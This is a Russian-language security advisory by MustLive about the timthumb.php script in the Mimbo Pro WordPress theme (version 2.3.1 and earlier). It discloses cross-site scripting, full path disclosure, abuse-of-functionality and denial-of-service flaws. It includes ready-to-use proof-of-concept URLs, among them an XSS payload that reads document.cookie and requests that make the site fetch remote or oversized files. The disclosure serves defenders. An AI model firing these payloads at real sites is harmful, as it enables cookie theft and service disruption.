Уязвимости в теме Mimbo Pro для WordPress

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting, Full
path disclosure, Abuse of Functionality и Denial of Service
уязвимостях в теме Mimbo Pro для WordPress. Это
коммерческий шаблон для WP.

XSS (WASC-08):

http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E

Full path disclosure (WASC-13):

http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site

http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site/page.png&h=1&w=1111111

http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site/page.png&h=1111111&w=1

http://site/wp-content/themes/mimbopro/

А также ещё десятки php-скриптов шаблона в папке
/mimbopro/ и всех подпапках.

Abuse of Functionality (WASC-42):

http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site&h=1&w=1

DoS (WASC-10):

http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site/big_file&h=1&w=1

О подобных AoF и DoS уязвимостях я писал в статье
Использование сайтов для атаки на другие сайты
(http://websecurity.com.ua/4322/).

Уязвимы Mimbo Pro 2.3.1 и предыдущие версии. XSS возможна
лишь в старых версиях шаблона. После моего уведомления,
разработчик исправил практически все уязвимости.

Дополнительная информация о данных уязвимостях у меня на
сайте:
http://websecurity.com.ua/4913/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua